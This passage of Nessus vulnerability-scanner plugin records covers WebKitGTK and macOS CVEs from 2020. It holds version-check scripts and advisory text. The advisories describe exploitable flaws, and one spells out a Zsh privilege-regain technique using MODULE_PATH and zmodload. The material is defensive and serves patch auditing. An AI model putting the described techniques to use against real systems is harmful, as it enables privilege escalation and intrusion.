prefix:\"libwebkit2gtk-4.0-37\", reference:\"2.28.3-2~deb10u1\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"libwebkit2gtk-4.0-37-gtk2\", reference:\"2.28.3-2~deb10u1\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"libwebkit2gtk-4.0-dev\", reference:\"2.28.3-2~deb10u1\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"libwebkit2gtk-4.0-doc\", reference:\"2.28.3-2~deb10u1\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"webkit2gtk-driver\", reference:\"2.28.3-2~deb10u1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-06-28T14:33:56", "description": "The WebKitGTK project reports vulnerabilities :\n\n- CVE-2020-9802: Processing maliciously crafted web content may lead to arbitrary code execution.\n\n- CVE-2020-9803: Processing maliciously crafted web content may lead to arbitrary code execution.\n\n- CVE-2020-9805: Processing maliciously crafted web content may lead to universal cross site scripting.\n\n- CVE-2020-9806: Processing maliciously crafted web content may lead to arbitrary code execution.\n\n- CVE-2020-9807: Processing maliciously crafted web content may lead to arbitrary code execution.\n\n- CVE-2020-9843: Processing maliciously crafted web content may lead to a cross site scripting attack.\n\n- CVE-2020-9850: A remote attacker may be able to cause arbitrary code execution.\n\n- CVE-2020-13753: CLONE_NEWUSER could potentially be used to confuse xdg- desktop-portal, which allows access outside the sandbox. TIOCSTI can be used to directly execute commands outside the sandbox by writing to the controlling terminal's input buffer.", "cvss3": {}, "published": "2020-09-21T00:00:00", "type": "nessus", "title": "FreeBSD : webkit2-gtk3 -- multible vulnerabilities (efd03116-c2a9-11ea-82bc-b42e99a1b9c3)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-13753", "CVE-2020-9802", "CVE-2020-9803", "CVE-2020-9805", "CVE-2020-9806", "CVE-2020-9807", "CVE-2020-9843", "CVE-2020-9850"], "modified": "2022-05-12T00:00:00", "cpe": ["p-cpe:/a:freebsd:freebsd:webkit2-gtk3", "cpe:/o:freebsd:freebsd"], "id": "FREEBSD_PKG_EFD03116C2A911EA82BCB42E99A1B9C3.NASL", "href": "https://www.tenable.com/plugins/nessus/140680", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2021 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(140680);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/05/12\");\n\n script_cve_id(\n \"CVE-2020-9802\",\n \"CVE-2020-9803\",\n \"CVE-2020-9805\",\n \"CVE-2020-9806\",\n \"CVE-2020-9807\",\n \"CVE-2020-9843\",\n \"CVE-2020-9850\",\n \"CVE-2020-13753\"\n );\n\n script_name(english:\"FreeBSD : webkit2-gtk3 -- multible vulnerabilities (efd03116-c2a9-11ea-82bc-b42e99a1b9c3)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote FreeBSD host is missing a security-related update.\");\n script_set_attribute(attribute:\"description\", value:\n\"The WebKitGTK project reports vulnerabilities :\n\n- CVE-2020-9802: Processing maliciously crafted web content may lead\nto arbitrary code execution.\n\n- CVE-2020-9803: Processing maliciously crafted web content may lead\nto arbitrary code execution.\n\n- CVE-2020-9805: Processing maliciously crafted web content may lead\nto universal cross site scripting.\n\n- CVE-2020-9806: Processing maliciously crafted web content may lead\nto arbitrary code execution.\n\n- CVE-2020-9807: Processing maliciously crafted web content may lead\nto arbitrary code execution.\n\n- CVE-2020-9843: Processing maliciously crafted web content may lead\nto a cross site scripting attack.\n\n- CVE-2020-9850: A remote attacker may be able to cause arbitrary code\nexecution.\n\n- CVE-2020-13753: CLONE_NEWUSER could potentially be used to confuse\nxdg- desktop-portal, which allows access outside the sandbox. TIOCSTI\ncan be used to directly execute commands outside the sandbox by\nwriting to the controlling terminal's input buffer.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://webkitgtk.org/security/WSA-2020-0006.html\");\n # https://vuxml.freebsd.org/freebsd/efd03116-c2a9-11ea-82bc-b42e99a1b9c3.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?113db128\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-9850\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2020-13753\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Safari in Operator Side Effect Exploit');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/07/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/07/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/09/21\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:webkit2-gtk3\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"webkit2-gtk3<2.28.3\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:pkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-06-27T14:17:05", "description": "This update for webkit2gtk3 fixes the following issues :\n\nUpdate to version 2.28.3 (bsc#1173998) :\n\n + Enable kinetic scrolling with async scrolling.\n\n + Fix web process hangs on large GitHub pages.\n\n + Bubblewrap sandbox should not attempt to bind empty paths.\n\n + Fix threading issues in the media player.\n\n + Fix several crashes and rendering issues.\n\n + Security fixes: CVE-2020-9802, CVE-2020-9803, CVE-2020-9805, CVE-2020-9806, CVE-2020-9807, CVE-2020-9843, CVE-2020-9850, CVE-2020-13753.\n\nNote that Tenable Network Security has extracted the preceding description block directly from the SUSE security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2020-07-22T00:00:00", "type": "nessus", "title": "SUSE SLED15 / SLES15 Security Update : webkit2gtk3 (SUSE-SU-2020:1992-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-13753", "CVE-2020-9802", "CVE-2020-9803", "CVE-2020-9805", "CVE-2020-9806", "CVE-2020-9807", "CVE-2020-9843", "CVE-2020-9850"], "modified": "2022-05-12T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:libjavascriptcoregtk-4_0", "p-cpe:/a:novell:suse_linux:libjavascriptcoregtk-4_0-18-debuginfo", "p-cpe:/a:novell:suse_linux:libwebkit2gtk-4_0", "p-cpe:/a:novell:suse_linux:libwebkit2gtk-4_0-37-debuginfo", "p-cpe:/a:novell:suse_linux:typelib-1_0-javascriptcore", "p-cpe:/a:novell:suse_linux:typelib-1_0-webkit2", "p-cpe:/a:novell:suse_linux:typelib-1_0-webkit2webextension", "p-cpe:/a:novell:suse_linux:webkit2gtk-4_0-injected-bundles", "p-cpe:/a:novell:suse_linux:webkit2gtk-4_0-injected-bundles-debuginfo", "p-cpe:/a:novell:suse_linux:webkit2gtk3-debugsource", "p-cpe:/a:novell:suse_linux:webkit2gtk3-devel", "cpe:/o:novell:suse_linux:15"], "id": "SUSE_SU-2020-1992-1.NASL", "href": "https://www.tenable.com/plugins/nessus/138833", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2020:1992-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(138833);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/05/12\");\n\n script_cve_id(\n \"CVE-2020-9802\",\n \"CVE-2020-9803\",\n \"CVE-2020-9805\",\n \"CVE-2020-9806\",\n \"CVE-2020-9807\",\n \"CVE-2020-9843\",\n \"CVE-2020-9850\",\n \"CVE-2020-13753\"\n );\n\n script_name(english:\"SUSE SLED15 / SLES15 Security Update : webkit2gtk3 (SUSE-SU-2020:1992-1)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote SUSE host is missing one or more security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"This update for webkit2gtk3 fixes the following issues :\n\nUpdate to version 2.28.3 (bsc#1173998) :\n\n + Enable kinetic scrolling with async scrolling.\n\n + Fix web process hangs on large GitHub pages.\n\n + Bubblewrap sandbox should not attempt to bind empty\n paths.\n\n + Fix threading issues in the media player.\n\n + Fix several crashes and rendering issues.\n\n + Security fixes: CVE-2020-9802, CVE-2020-9803,\n CVE-2020-9805, CVE-2020-9806, CVE-2020-9807,\n CVE-2020-9843, CVE-2020-9850, CVE-2020-13753.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/show_bug.cgi?id=1173998\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2020-13753/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2020-9802/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2020-9803/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2020-9805/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2020-9806/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2020-9807/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2020-9843/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2020-9850/\");\n # https://www.suse.com/support/update/announcement/2020/suse-su-20201992-1\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?a8a3d7cf\");\n script_set_attribute(attribute:\"solution\", value:\n\"To install this SUSE Security Update use the SUSE recommended\ninstallation methods like YaST online_update or 'zypper patch'.\n\nAlternatively you can run the command listed for your product :\n\nSUSE Linux Enterprise Module for Desktop Applications 15-SP2 :\n\nzypper in -t patch\nSUSE-SLE-Module-Desktop-Applications-15-SP2-2020-1992=1\n\nSUSE Linux Enterprise Module for Basesystem 15-SP2 :\n\nzypper in -t patch SUSE-SLE-Module-Basesystem-15-SP2-2020-1992=1\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-9850\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2020-13753\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Safari in Operator Side Effect Exploit');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/06/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/07/21\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/07/22\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libjavascriptcoregtk-4_0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libjavascriptcoregtk-4_0-18-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libwebkit2gtk-4_0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libwebkit2gtk-4_0-37-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:typelib-1_0-JavaScriptCore\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:typelib-1_0-WebKit2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:typelib-1_0-WebKit2WebExtension\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:webkit2gtk-4_0-injected-bundles\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:webkit2gtk-4_0-injected-bundles-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:webkit2gtk3-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:webkit2gtk3-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:15\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"SuSE Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLED15|SLES15)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLED15 / SLES15\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES15\" && (! preg(pattern:\"^(2)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES15 SP2\", os_ver + \" SP\" + sp);\nif (os_ver == \"SLED15\" && (! preg(pattern:\"^(2)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLED15 SP2\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES15\", sp:\"2\", reference:\"libjavascriptcoregtk-4_0-18-2.28.3-3.3.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"2\", reference:\"libjavascriptcoregtk-4_0-18-debuginfo-2.28.3-3.3.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"2\", reference:\"libwebkit2gtk-4_0-37-2.28.3-3.3.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"2\", reference:\"libwebkit2gtk-4_0-37-debuginfo-2.28.3-3.3.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"2\", reference:\"typelib-1_0-JavaScriptCore-4_0-2.28.3-3.3.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"2\", reference:\"typelib-1_0-WebKit2-4_0-2.28.3-3.3.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"2\", reference:\"typelib-1_0-WebKit2WebExtension-4_0-2.28.3-3.3.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"2\", reference:\"webkit2gtk-4_0-injected-bundles-2.28.3-3.3.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"2\", reference:\"webkit2gtk-4_0-injected-bundles-debuginfo-2.28.3-3.3.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"2\", reference:\"webkit2gtk3-debugsource-2.28.3-3.3.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"2\", reference:\"webkit2gtk3-devel-2.28.3-3.3.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"2\", reference:\"libjavascriptcoregtk-4_0-18-2.28.3-3.3.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"2\", reference:\"libjavascriptcoregtk-4_0-18-debuginfo-2.28.3-3.3.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"2\", reference:\"libwebkit2gtk-4_0-37-2.28.3-3.3.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"2\", reference:\"libwebkit2gtk-4_0-37-debuginfo-2.28.3-3.3.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"2\", reference:\"typelib-1_0-JavaScriptCore-4_0-2.28.3-3.3.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"2\", reference:\"typelib-1_0-WebKit2-4_0-2.28.3-3.3.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"2\", reference:\"typelib-1_0-WebKit2WebExtension-4_0-2.28.3-3.3.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"2\", reference:\"webkit2gtk-4_0-injected-bundles-2.28.3-3.3.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"2\", reference:\"webkit2gtk-4_0-injected-bundles-debuginfo-2.28.3-3.3.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"2\", reference:\"webkit2gtk3-debugsource-2.28.3-3.3.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"2\", reference:\"webkit2gtk3-devel-2.28.3-3.3.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"webkit2gtk3\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T15:00:48", "description": "The remote host is running a version of macOS / Mac OS X that is 10.15.x prior to 10.15.5, 10.13.x prior to 10.13.6 Security Update 2020-003, 10.14.x prior to 10.14.6 Security Update 2020-003. It is, therefore, affected by multiple vulnerabilities:\n\n - In ksh version 20120801, a flaw was found in the way it evaluates certain environment variables. An attacker could use this flaw to override or bypass environment restrictions to execute shell commands. Services and applications that allow remote unauthenticated attackers to provide one of those environment variables could allow them to exploit this issue remotely.\n (CVE-2019-14868)\n\n - In Zsh before 5.8, attackers able to execute commands can regain privileges dropped by the --no-PRIVILEGED option. Zsh fails to overwrite the saved uid, so the original privileges can be restored by executing MODULE_PATH=/dir/with/module zmodload with a module that calls setuid(). (CVE-2019-20044)\n\n - An out-of-bounds read was addressed with improved input validation. This issue is fixed in iOS 13.3.1 and iPadOS 13.3.1, macOS Catalina 10.15.3, tvOS 13.3.1, watchOS 6.1.2. Processing a maliciously crafted image may lead to arbitrary code execution. (CVE-2020-3878)\n\nNote that Nessus has not tested for this issue but has instead relied only on the operating system's self-reported version number.", "cvss3": {}, "published": "2020-05-28T00:00:00", "type": "nessus", "title": "macOS 10.15.x < 10.15.5 / 10.14.x < 10.14.6 Security Update 2020-003 / 10.13.x < 10.13.6 Security Update 2020-003", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2019-14868", "CVE-2019-20044", "CVE-2020-3878", "CVE-2020-3882", "CVE-2020-9771", "CVE-2020-9772", "CVE-2020-9788", "CVE-2020-9789", "CVE-2020-9790", "CVE-2020-9791", "CVE-2020-9792", "CVE-2020-9793", "CVE-2020-9794", "CVE-2020-9795", "CVE-2020-9797", "CVE-2020-9804", "CVE-2020-9808", "CVE-2020-9809", "CVE-2020-9811", "CVE-2020-9812", "CVE-2020-9813", "CVE-2020-9814", "CVE-2020-9815", "CVE-2020-9816", "CVE-2020-9817", "CVE-2020-9821", "CVE-2020-9822", "CVE-2020-9824", "CVE-2020-9825", "CVE-2020-9826", "CVE-2020-9827", "CVE-2020-9828", "CVE-2020-9830", "CVE-2020-9831", "CVE-2020-9832", "CVE-2020-9833", "CVE-2020-9834", "CVE-2020-9837", "CVE-2020-9839", "CVE-2020-9841", "CVE-2020-9842", "CVE-2020-9844", "CVE-2020-9847", "CVE-2020-9851", "CVE-2020-9852", "CVE-2020-9855", "CVE-2020-9856", "CVE-2020-9857"], "modified": "2022-05-13T00:00:00", "cpe": ["cpe:/o:apple:mac_os_x", "cpe:/o:apple:macos"], "id": "MACOS_HT211170.NASL", "href": "https://www.tenable.com/plugins/nessus/136930", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(136930);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/05/13\");\n\n script_cve_id(\n \"CVE-2019-14868\",\n \"CVE-2019-20044\",\n \"CVE-2020-3878\",\n \"CVE-2020-3882\",\n \"CVE-2020-9771\",\n \"CVE-2020-9772\",\n \"CVE-2020-9788\",\n \"CVE-2020-9789\",\n \"CVE-2020-9790\",\n \"CVE-2020-9791\",\n \"CVE-2020-9792\",\n \"CVE-2020-9793\",\n \"CVE-2020-9794\",\n \"CVE-2020-9795\",\n \"CVE-2020-9797\",\n \"CVE-2020-9804\",\n \"CVE-2020-9808\",\n \"CVE-2020-9809\",\n \"CVE-2020-9811\",\n \"CVE-2020-9812\",\n \"CVE-2020-9813\",\n \"CVE-2020-9814\",\n \"CVE-2020-9815\",\n \"CVE-2020-9816\",\n \"CVE-2020-9817\",\n \"CVE-2020-9821\",\n \"CVE-2020-9822\",\n \"CVE-2020-9824\",\n \"CVE-2020-9825\",\n \"CVE-2020-9826\",\n \"CVE-2020-9827\",\n \"CVE-2020-9828\",\n \"CVE-2020-9830\",\n \"CVE-2020-9831\",\n \"CVE-2020-9832\",\n \"CVE-2020-9833\",\n \"CVE-2020-9834\",\n \"CVE-2020-9837\",\n \"CVE-2020-9839\",\n \"CVE-2020-9841\",\n \"CVE-2020-9842\",\n \"CVE-2020-9844\",\n \"CVE-2020-9847\",\n \"CVE-2020-9851\",\n \"CVE-2020-9852\",\n \"CVE-2020-9855\",\n \"CVE-2020-9856\",\n \"CVE-2020-9857\"\n );\n script_xref(name:\"APPLE-SA\", value:\"APPLE-SA-2020-05-18\");\n script_xref(name:\"APPLE-SA\", value:\"HT211170\");\n script_xref(name:\"IAVA\", value:\"2020-A-0227-S\");\n\n script_name(english:\"macOS 10.15.x < 10.15.5 / 10.14.x < 10.14.6 Security Update 2020-003 / 10.13.x < 10.13.6 Security Update 2020-003\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host is missing a macOS update that fixes multiple vulnerabilities\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote host is running a version of macOS / Mac OS X that is 10.15.x prior to 10.15.5, 10.13.x prior to 10.13.6\nSecurity Update 2020-003, 10.14.x prior to 10.14.6 Security Update 2020-003. It is, therefore, affected by multiple\nvulnerabilities:\n\n - In ksh version 20120801, a flaw was found in the way it\n evaluates certain environment variables. An attacker\n could use this flaw to override or bypass environment\n restrictions to execute shell commands. Services and\n applications that allow remote unauthenticated attackers\n to provide one of those environment variables could\n allow them to exploit this issue remotely.\n (CVE-2019-14868)\n\n - In Zsh before 5.8, attackers able to execute commands\n can regain privileges dropped by the --no-PRIVILEGED\n option. Zsh fails to overwrite the saved uid, so the\n original privileges can be restored by executing\n MODULE_PATH=/dir/with/module zmodload with a module that\n calls setuid(). (CVE-2019-20044)\n\n - An out-of-bounds read was addressed with improved input\n validation. This issue is fixed in iOS 13.3.1 and iPadOS\n 13.3.1, macOS Catalina 10.15.3, tvOS 13.3.1, watchOS\n 6.1.2. Processing a maliciously crafted image may lead\n to arbitrary code execution. (CVE-2020-3878)\n\nNote that Nessus has not tested for this issue but has instead relied only on the operating system's self-reported\nversion number.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.apple.com/en-us/HT211170\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to macOS 10.15.5 / 10.14.x < 10.14.6 Security Update 2020-003 / 10.13.x < 10.13.6 Security Update 2020-003 or\nlater\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-9852\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2020-9790\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Safari in Operator Side Effect Exploit');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/02/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/05/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/05/28\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"combined\");\n script_set_attribute(attribute:\"cpe\", 